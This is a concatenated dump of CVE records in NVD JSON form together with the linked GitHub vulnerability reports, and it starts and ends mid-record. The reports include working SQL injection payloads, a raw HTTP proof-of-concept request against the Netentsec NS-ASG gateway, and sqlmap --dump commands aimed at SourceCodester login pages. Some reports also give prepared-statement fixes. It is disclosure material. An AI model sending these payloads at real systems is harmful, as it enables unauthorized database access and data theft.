"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CveSecLook/cve/issues/39 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code 1.0 login.php SQL injection vulnerability
# NAME OF AFFECTED PRODUCT(S)
+ Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code
## Vendor Homepage
+ https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Huang Yue
## Vulnerable File
+ login.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/fkgeo/medical-store-source.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'login.php' file of the 'Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code' project. This issue arises because user inputs $user and $pass from $_POST['email'] and $_POST['password'] are directly used in SQL queries without proper sanitization or validation. This allows attackers to craft input values that can manipulate the SQL query and execute unauthorized operations.
+ 
## Vulnerability code snippets
```php
<?php
if (isset($_POST['login']))
{
$user = $_POST['email'];
$pass = $_POST['password'];
$con = new mysqli('localhost','root','','medical');
$result = $con->query("SELECT * FROM users WHERE email='$user' AND password='$pass'");
if($result->num_rows>0)
{
session_start();
$data = $result->fetch_assoc();
$_SESSION['userId']=$data['id'];
$_SESSION['bill'] = array();
header('location:index.php');
}
else
{
echo
"<script>
\$(document).ready(function(){\$('#error').slideDown().html('Login Error! Try again.').delay(3000).fadeOut();});
</script>
}
}
```
+ In the aforementioned code, the user inputs $user and $pass are directly embedded into the SQL query statement without any form of processing. This allows attackers to manipulate the query statement by including malicious SQL code in their inputs, thereby executing unauthorized database operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the "Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code," Huang Yue discovered a critical SQL injection vulnerability in the `login.php` file. This vulnerability stems from inadequate validation of user inputs for the email and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ OR boolean-based blind - WHERE or HAVING clause
+ MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
+ MySQL >= 5.0.12 AND time-based blind (query SLEEP)
## Vulnerability location:
+ 'email' parameter
## Payload:
```sql
email=-4156' OR 1214=1214-- DSCn&password=123&login=
email=111@qq.com' OR ROW(5293,9929)>(SELECT COUNT(*),CONCAT(0x717a7a7a71,(SELECT (ELT(5293=5293,1))),0x71706b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 8662 UNION SELECT 9796 UNION SELECT 9505 UNION SELECT 3269)a GROUP BY x)-- ahqP&password=123&login=
email=111@qq.com' AND (SELECT 8848 FROM (SELECT(SLEEP(5)))zeUx)-- fOou&password=123&login=
```
```makefile
Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: email=-4156' OR 1214=1214-- DSCn&password=123&login=
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: email=111@qq.com' OR ROW(5293,9929)>(SELECT COUNT(*),CONCAT(0x717a7a7a71,(SELECT (ELT(5293=5293,1))),0x71706b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 8662 UNION SELECT 9796 UNION SELECT 9505 UNION SELECT 3269)a GROUP BY x)-- ahqP&password=123&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=111@qq.com' AND (SELECT 8848 FROM (SELECT(SLEEP(5)))zeUx)-- fOou&password=123&login=
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -u "http://192.168.31.216:8116/login.php" --data="email=111@qq.com&password=123&login=" --batch --dbms=mysql --level=5 --risk=3 --dump
```
+ 
+ 
+ 
+ 
+ 
+ 
+ 
# Suggested repair
+ To prevent SQL injection vulnerabilities, it is recommended to use preprocessed statements and parameter binding when processing user input. The modified code is as follows:
```php
if (isset($_POST['login'])) {
$user = $_POST['email'];
$pass = $_POST['password'];
$con = new mysqli('localhost', 'root', '', 'medical');
// 使用预处理语句
$stmt = $con->prepare("SELECT * FROM users WHERE email=? AND password=?");
$stmt->bind_param("ss", $user, $pass);
$stmt->execute();
$result = $stmt->get_result();
if ($result->num_rows > 0) {
session_start();
$data = $result->fetch_assoc();
$_SESSION['userId'] = $data['id'];
$_SESSION['bill'] = array();
header('Location: index.php');
} else {
echo "<script>
\$(document).ready(function(){
\$('#error').slideDown().html('Login Error! Try again.').delay(3000).fadeOut();
});
</script>";
}
$stmt->close();
$con->close();
}
```
| SourceCodester Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code 1.0 login.php SQL injection vulnerability | https://api.github.com/repos/CveSecLook/cve/issues/39/comments | 0 | 2024-05-21T09:26:36Z | 2024-05-21T09:26:36Z | https://github.com/CveSecLook/cve/issues/39 | 2,307,818,147 | 39 | 6,055 |
CVE-2024-36827 | 2024-06-07T19:15:24.017 | An XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of ebookmeta before v1.2.8 allows attackers to access sensitive information or cause a Denial of Service (DoS) via crafted XML input. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dnkorpushov/ebookmeta/issues/16#issue-2317712335"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dnkorpushov/ebookmeta/issues/16#issue-2317712335"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dnkorpushov:ebookmeta:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6BA99F79-C8DC-4E7C-9572-13FAF67C04DB",
"versionEndExcluding": "1.2.8",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"611"
] | 611 | https://github.com/dnkorpushov/ebookmeta/issues/16#issue-2317712335 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"dnkorpushov",
"ebookmeta"
] | I found that when the ebookmeta version is less than 1.2.8 and the lxml version is less than 4.9.1, the ebookmeta.get_metadata function will have an xxe vulnerability. An attacker could use this vulnerability to read sensitive information from the server.
| xxe vulnerability in ebookmeta.get_metadata() | https://api.github.com/repos/dnkorpushov/ebookmeta/issues/16/comments | 0 | 2024-05-26T13:24:04Z | 2024-07-09T14:48:05Z | https://github.com/dnkorpushov/ebookmeta/issues/16 | 2,317,712,335 | 16 | 6,056 |
CVE-2024-5773 | 2024-06-09T03:15:55.633 | A vulnerability, which was classified as critical, was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected is an unknown function of the file /protocol/firewall/deletemacbind.php. The manipulation of the argument messagecontent leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-267456. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/L1OudFd8cl09/CVE/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.267456"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.267456"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.349551"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/L1OudFd8cl09/CVE/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.267456"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.267456"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.349551"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netentsec:application_security_gateway:6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7A708923-EF5F-4F53-86F3-DF0366E6FB58",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/L1OudFd8cl09/CVE/issues/3 | [
"Exploit"
] | github.com | [
"L1OudFd8cl09",
"CVE"
] | Beijing Wangkang Technology Co., Ltd. is a leading provider of network application management equipment in China, focusing on the latest trend research and analysis in the field of network application management. It provides users with advanced network application management technology, products, and solutions, aiming to help users achieve the goal of "using the internet well" in network management.
There is an SQL injection vulnerability in the Netcom NS-ASG application security gateway. Attackers exploit vulnerabilities to cause harm to servers.
official: https://www.netentsec.com/
version:6.3
Vulnerability Path :/protocol/firewall/deletemacbind.php
As shown in the figure, the $messageconten value in the packet will accept the value of the $BandIPMacId array variable, which will be carried into the sql statement in the figure below and executed without any restrictions.
<img width="519" alt="图片" src="https://github.com/L1OudFd8cl09/CVE/assets/171440363/ff94b63d-5874-4621-905a-f67c80529cb7">
Poc:
```
POST /protocol/index.php HTTP/1.1
Host: 127001:443
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
jsoncontent={"protocolType":"deletemacbind","messagecontent":["444'and(updatexml(1,concat(0x7e,(select+version())),1))='"]}
```
<img width="531" alt="图片" src="https://github.com/L1OudFd8cl09/CVE/assets/171440363/27916905-40b7-4cae-8987-a11f7bb6f07a"> | NS-ASG application security gateway. Attackers exploit vulnerabilities | https://api.github.com/repos/L1OudFd8cl09/CVE/issues/3/comments | 0 | 2024-06-04T01:25:59Z | 2024-06-10T01:56:59Z | https://github.com/L1OudFd8cl09/CVE/issues/3 | 2,332,337,521 | 3 | 6,057 |
CVE-2024-5774 | 2024-06-09T06:15:07.410 | A vulnerability has been found in SourceCodester Stock Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file index.php of the component Login. The manipulation of the argument username/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-267457 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/CveSecLook/cve/issues/43"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.267457"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.267457"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.352337"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/CveSecLook/cve/issues/43"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.267457"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.267457"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.352337"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:warrendaloyan:stock_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8F75A0CB-D496-4651-8633-972D8FA69746",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CveSecLook/cve/issues/43 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Stock Management System in PHP 1.0 index.php SQL injection vulnerability
# NAME OF AFFECTED PRODUCT(S)
+ Stock Management System in PHP
## Vendor Homepage
+ https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ xuanluansec
## Vulnerable File
+ index.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the `index.php` file of the `Stock Management System` project. This issue arises because user inputs `$username` and `$password` from `$_POST['username']` and `$_POST['password']` are directly used in SQL queries without proper sanitization or validation. This allows attackers to craft input values that can manipulate the SQL query and execute unauthorized operations.
## Vulnerability code snippets
```php
if($_POST) {
$username = $_POST['username'];
$password = $_POST['password'];
if(empty($username) || empty($password)) {
if($username == "") {
$errors[] = "Username is required";
}
if($password == "") {
$errors[] = "Password is required";
}
} else {
$sql = "SELECT * FROM users WHERE username = '$username'";
$result = $connect->query($sql);
if($result->num_rows == 1) {
$password = md5($password);
// exists
$mainSql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$mainResult = $connect->query($mainSql);
if($mainResult->num_rows == 1) {
$value = $mainResult->fetch_assoc();
$user_id = $value['user_id'];
// set session
$_SESSION['userId'] = $user_id;
header('location: http://localhost/stock/dashboard.php');
} else{
$errors[] = "Incorrect username/password combination";
} // /else
} else {
$errors[] = "Username doesnot exists";
} // /else
} // /else not empty username // password
} // /if $_POST
?>
```
+ In the above code, the username and password are directly embedded in the SQL query, making them vulnerable to SQL injection attacks
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the "Stock Management System," xuanluansec discovered a critical SQL injection vulnerability in the `index.php` file. This vulnerability stems from inadequate validation of user inputs for the username and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ MySQL >= 5.0.12 AND time-based blind (query SLEEP)
## Vulnerability location:
+ 'username' parameter
## Payload:
```sql
username=11' AND (SELECT 5107 FROM (SELECT(SLEEP(5)))kTLs) AND 'iIbh'='iIbh&password=11
```
```makefile
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=11' AND (SELECT 5107 FROM (SELECT(SLEEP(5)))kTLs) AND 'iIbh'='iIbh&password=11
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -u "http://20.20.20.128:8117/index.php" --data="username=11&password=11" --batch --dbms=mysql --level=5 --risk=3 --dump
```
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
# Suggested repair
1. **Use preprocessed statements and parameter binding**: Prevent SQL injection by using preprocessed statements and parameterized queries. For example, using PDO or MySQL extensions.
2. **Verify and Filter User Input**: Verify and filter all user inputs to ensure that the format and type of input data meet expectations.
3. **Secure Password Storage**: Use a more secure hash algorithm to store passwords, such as the password_hash function, instead of using simple MD5 or SHA1.
## Example code fix:
```php
if ($_POST) {
$username = $_POST['username'];
$password = $_POST['password'];
if (empty($username) || empty($password)) {
if ($username == "") {
$errors[] = "Username is required";
}
if ($password == "") {
$errors[] = "Password is required";
}
} else {
// 使用预处理语句防止SQL注入
$stmt = $connect->prepare("SELECT * FROM users WHERE username = ?");
$stmt->bind_param("s", $username);
$stmt->execute();
$result = $stmt->get_result();
if ($result->num_rows == 1) {
$password = md5($password);
// exists
$stmt = $connect->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
$mainResult = $stmt->get_result();
if ($mainResult->num_rows == 1) {
$value = $mainResult->fetch_assoc();
$user_id = $value['user_id'];
// set session
$_SESSION['userId'] = $user_id;
}
}
}
}
```
| SourceCodester Stock Management System in PHP 1.0 index.php SQL injection vulnerability | https://api.github.com/repos/CveSecLook/cve/issues/43/comments | 0 | 2024-06-08T04:24:31Z | 2024-06-08T04:24:31Z | https://github.com/CveSecLook/cve/issues/43 | 2,341,450,040 | 43 | 6,058 |
CVE-2024-5775 | 2024-06-09T08:15:23.373 | A vulnerability was found in SourceCodester Vehicle Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file updatebill.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-267458 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
